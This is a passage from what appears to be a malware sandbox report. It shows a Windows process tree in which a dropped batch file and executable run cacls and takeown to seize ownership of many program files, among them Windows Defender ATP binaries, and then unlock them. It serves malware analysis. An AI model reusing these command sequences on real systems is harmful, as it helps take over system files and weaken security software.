    takeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:3240
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:4340
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  PID:4552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:4424
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2248
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""
  2⤵
  PID:4136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "manifest.json" -nobanner
    3⤵
    PID:3716
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "manifest.json" -nobanner
      4⤵
      Executes dropped EXE
      PID:3132
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:2120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:4408
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:3308
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:224
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4560
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""
  2⤵
  PID:4744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "BrowserCore.exe.mui" -nobanner
    3⤵
    PID:4608
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "BrowserCore.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4564
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Mail\WinMail.exe""
  2⤵
  PID:372
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\WinMail.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:3208
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2172
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:2684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4324
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4044
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe""
  2⤵
  PID:3144
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe" /E /G Admin:F /C
    3⤵
    PID:4592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "SenseSampleUploader.exe" -nobanner
    3⤵
    PID:4872
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "SenseSampleUploader.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4900
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""
  2⤵
  PID:284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "BrowserCore.exe" -nobanner
    3⤵
    PID:4648
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "BrowserCore.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4888
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe""
  2⤵
  PID:2072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" /E /G Admin:F /C
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "SenseCncProxy.exe" -nobanner
    3⤵
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "SenseCncProxy.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2708
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:2204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4272
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4400
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2576
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:3076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:2160
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4084
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""
  2⤵
  PID:308
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:4620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:4024
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:3540
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:2188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:2892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:2588
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:3080
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:2592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:4836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:688
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:208
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe""
  2⤵
  PID:4896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" /E /G Admin:F /C
    3⤵
    PID:4904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "MsSense.exe" -nobanner
    3⤵
    PID:3200
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "MsSense.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2524
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:4660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4628
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4056
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"
    3⤵
    - Modifies file permissions
    PID:3116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:4876
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "Identity-V" -nobanner
      4⤵
      Executes dropped EXE
      PID:1916
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:4832
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:220
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3552
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui""
  2⤵
  PID:4612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui"
    3⤵
    - Modifies file permissions
    PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "MsSense.exe.mui" -nobanner
    3⤵
    PID:3088
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "MsSense.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3580
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2252
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:60
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""
  2⤵
  PID:3120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"
    3⤵
    - Modifies file permissions
    PID:4664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
    3⤵
    PID:2984
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2216
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:4360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:296
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:4412
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:4572
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:3696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:3972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    PID:4252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:3812
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:3012
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3668
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""
  2⤵
  PID:1284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"
    3⤵
    - Modifies file permissions
    PID:5128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:5144
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:5156
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5176
- C:\Windows\SysWOW64\cmd.exe
